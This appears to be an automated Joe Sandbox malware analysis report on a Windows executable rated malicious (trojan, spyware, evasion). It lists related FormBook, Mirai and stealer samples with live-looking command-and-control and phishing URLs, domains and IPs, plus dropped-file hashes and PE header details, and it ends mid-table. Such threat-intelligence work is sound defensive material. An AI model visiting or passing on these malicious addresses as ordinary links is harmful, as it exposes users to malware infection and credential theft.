                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1586004
                                                                      Start date and time:2025-01-08 16:11:35 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 10s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
                                                                      Number of analysed new started processes analysed:8
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:KSts9xW7qy.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@13/11
                                                                      EGA Information:
                                                                      • Successful, ratio: 75%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 49
                                                                      • Number of non-executed functions: 299
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 4.245.163.56, 13.107.246.45
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target pTPcvfjkbwUWkD.exe, PID 2412 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • VT rate limit hit for: KSts9xW7qy.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      194.195.220.41Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • www.earbudsstore.shop/0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU=
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • www.earbudsstore.shop/0gis/
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • www.earbudsstore.shop/0gis/
                                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                      • www.gemtastic.shop/junu/
                                                                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                                      • www.techcables.shop/0hup/
                                                                      TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                      • www.ytonetgearhub.shop/l8y2/
                                                                      swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cheapdesklamp.shop/9nq7/
                                                                      209.74.77.109Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx
                                                                      Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
                                                                      Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                      • www.greenthub.life/r3zg/
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dailyfuns.info/n9b0/
                                                                      W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.gogawithme.live/6gtt/
                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.futuru.xyz/8uep/
                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • www.greenthub.life/r3zg/
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • www.moviebuff.info/4r26/
                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                      • www.gogawithme.live/6gtt/
                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                      • www.gogawithme.live/6gtt/
                                                                      188.114.97.3GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                      • /api/get/dll
                                                                      DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                      • www.uzshou.world/ricr/
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cifasnc.info/8rr3/
                                                                      Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cifasnc.info/8rr3/
                                                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                      • /api/get/free
                                                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                      • /api/get/free
                                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                      • www.rgenerousrs.store/o362/
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.mydreamdeal.clickInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.27.59
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.169.6
                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 104.21.27.59
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      www.dating-apps-az-dn5.xyzDHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      www.zxyck.netInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      www.maitreyatoys.worldInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousUnknownBrowse
                                                                      • 104.18.95.41
                                                                      https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
                                                                      • 104.18.86.42
                                                                      XL-1-6-25-(EXCEL LATEST 2025).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9Get hashmaliciousPhisherBrowse
                                                                      • 188.114.96.3
                                                                      http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=Get hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.coGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 188.114.96.3
                                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 104.21.53.168
                                                                      Selvi Payroll Benefits & Bonus Agreementfdp.pdfGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                      • 103.1.185.157
                                                                      http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.16.131.131
                                                                      http://coastiesmag.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.4.234.120
                                                                      TRe8oqmYKc.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      CSLDEmiori.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 194.245.229.87
                                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.229.64
                                                                      Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.230.66
                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 159.25.86.139
                                                                      nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.230.82
                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 194.245.186.15
                                                                      PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 159.25.233.243
                                                                      NEXINTO-DEATT562720.htmGet hashmaliciousUnknownBrowse
                                                                      • 194.163.42.36
                                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                                      • 212.229.142.163
                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 212.228.15.172
                                                                      chernobyl.i586.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      MULTIBAND-NEWHOPEUSrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.40
                                                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.189
                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.41
                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.40
                                                                      ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                      • 209.74.95.101
                                                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.42
                                                                      Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.187

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\-4EF4J77B

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\winrs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
                                                                      Entropy (8bit):0.9746603542602881
                                                                      Encrypted:false
                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\autBCED.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KSts9xW7qy.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):287744
                                                                      Entropy (8bit):7.995366552330444
                                                                      Encrypted:true
                                                                      SSDEEP:6144:hog9HDHJiPjcVQ/wdG50O1JO6boTyw1PnRBn0KBex+mXPCkrs/AFs:hoYjHJiPjczMNJO6aysPRB0KBex+mXPc
                                                                      MD5:E5B683F350C2C1EFF6F6ACCCDF76A1F9
                                                                      SHA1:72DAB3857C699484AB1A8A95151F71798BD51C7F
                                                                      SHA-256:ADBCFC5810D4EABE1C074200350DEE6A07AFD0B921D5059529EAEDEE5C4E236D
                                                                      SHA-512:B400BDC1CD2563E864024C956FF91A1C41F5986FFCE255694BF25DEB7C5701521E1A15DAEB5789972D9F23E65B5E6B7DDC2C6F69C74E24E10C9FB0D4D1E202CB
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.h.6Y3FUSAML..3I.AW81QCF.L2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWA.LXO=V.OW.8.b.H..ob2Z5u'3"+*.^iT 9V^%c$,l@;XzZ(u...l5 W,.LZ2.QCFIL2NO[:.h7&.q8(.tW&."...|)+.T...z50.W...)P..QR9~&..2N6Z3FUW..LX.2H7.ezlQCFIL2N6.3DT\@FLX.7I7AW81QCF.X2N6J3FU'EMLX.3I'AW83QC@IL2N6Z3@UWAMLXO393AW:1QCFIL0Nv.3FEWA]LXO3Y7AG81QCFI\2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3F{#$58XO3mgEW8!QCF.H2N&Z3FUWAMLXO3I7Aw811CFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFI

                                                                      C:\Users\user\AppData\Local\Temp\poufs

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KSts9xW7qy.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):287744
                                                                      Entropy (8bit):7.995366552330444
                                                                      Encrypted:true
                                                                      SSDEEP:6144:hog9HDHJiPjcVQ/wdG50O1JO6boTyw1PnRBn0KBex+mXPCkrs/AFs:hoYjHJiPjczMNJO6aysPRB0KBex+mXPc
                                                                      MD5:E5B683F350C2C1EFF6F6ACCCDF76A1F9
                                                                      SHA1:72DAB3857C699484AB1A8A95151F71798BD51C7F
                                                                      SHA-256:ADBCFC5810D4EABE1C074200350DEE6A07AFD0B921D5059529EAEDEE5C4E236D
                                                                      SHA-512:B400BDC1CD2563E864024C956FF91A1C41F5986FFCE255694BF25DEB7C5701521E1A15DAEB5789972D9F23E65B5E6B7DDC2C6F69C74E24E10C9FB0D4D1E202CB
                                                                      Malicious:false
                                                                      Preview:.h.6Y3FUSAML..3I.AW81QCF.L2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWA.LXO=V.OW.8.b.H..ob2Z5u'3"+*.^iT 9V^%c$,l@;XzZ(u...l5 W,.LZ2.QCFIL2NO[:.h7&.q8(.tW&."...|)+.T...z50.W...)P..QR9~&..2N6Z3FUW..LX.2H7.ezlQCFIL2N6.3DT\@FLX.7I7AW81QCF.X2N6J3FU'EMLX.3I'AW83QC@IL2N6Z3@UWAMLXO393AW:1QCFIL0Nv.3FEWA]LXO3Y7AG81QCFI\2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3F{#$58XO3mgEW8!QCF.H2N&Z3FUWAMLXO3I7Aw811CFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFIL2N6Z3FUWAMLXO3I7AW81QCFI

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.14010960049132
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:KSts9xW7qy.exe
                                                                      File size:1'207'296 bytes
                                                                      MD5:0cff79b58dc5c20effd62a99e489556c
                                                                      SHA1:fc68ff8f2d72961ccedda7fe76c95f1270e21d10
                                                                      SHA256:faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea
                                                                      SHA512:705b50572adb78326f67654cacc7a3745391e0c37bda0589abd4d91e5c7e2ed50619e8a39833803ef2d88f799ccd3ca4d3ad79f73ddf126bfe4449c8ce88be56
                                                                      SSDEEP:24576:Itb20pkaCqT5TBWgNQ7aTfLAKuhoiGwaSGQvVP3C6A:RVg5tQ7aTfLAKAGwaiRS5
                                                                      TLSH:7C45D01273DE8365C3B25273BA65B701BEBF782506A1F56B2FD80D3DA920122521E773
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                      File Icon

                                                                      Icon Hash:aaf3e3e3938382a0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x425f74
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67485DC5 [Thu Nov 28 12:10:45 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007FE1C0C7075Fh
                                                                      jmp 00007FE1C0C63774h
                                                                      int3
                                                                      int3
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [esp+10h]
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov edi, dword ptr [esp+0Ch]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007FE1C0C638FAh
                                                                      cmp edi, eax
                                                                      jc 00007FE1C0C63C5Eh
                                                                      bt dword ptr [004C0158h], 01h
                                                                      jnc 00007FE1C0C638F9h
                                                                      rep movsb
                                                                      jmp 00007FE1C0C63C0Ch
                                                                      cmp ecx, 00000080h
                                                                      jc 00007FE1C0C63AC4h
                                                                      mov eax, edi
                                                                      xor eax, esi
                                                                      test eax, 0000000Fh
                                                                      jne 00007FE1C0C63900h
                                                                      bt dword ptr [004BA370h], 01h
                                                                      jc 00007FE1C0C63DD0h
                                                                      bt dword ptr [004C0158h], 00000000h
                                                                      jnc 00007FE1C0C63A9Dh
                                                                      test edi, 00000003h
                                                                      jne 00007FE1C0C63AAEh
                                                                      test esi, 00000003h
                                                                      jne 00007FE1C0C63A8Dh
                                                                      bt edi, 02h
                                                                      jnc 00007FE1C0C638FFh
                                                                      mov eax, dword ptr [esi]
                                                                      sub ecx, 04h
                                                                      lea esi, dword ptr [esi+04h]
                                                                      mov dword ptr [edi], eax
                                                                      lea edi, dword ptr [edi+04h]
                                                                      bt edi, 03h
                                                                      jnc 00007FE1C0C63903h
                                                                      movq xmm1, qword ptr [esi]
                                                                      sub ecx, 08h
                                                                      lea esi, dword ptr [esi+08h]
                                                                      movq qword ptr [edi], xmm1
                                                                      lea edi, dword ptr [edi+08h]
                                                                      test esi, 00000007h
                                                                      je 00007FE1C0C63955h
                                                                      bt esi, 03h
                                                                      jnc 00007FE1C0C639A8h
                                                                      movdqa xmm1, dqword ptr [esi+00h]

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                      • [RES] VS2012 UPD4 build 61030
                                                                      • [LNK] VS2012 UPD4 build 61030

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5da3c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
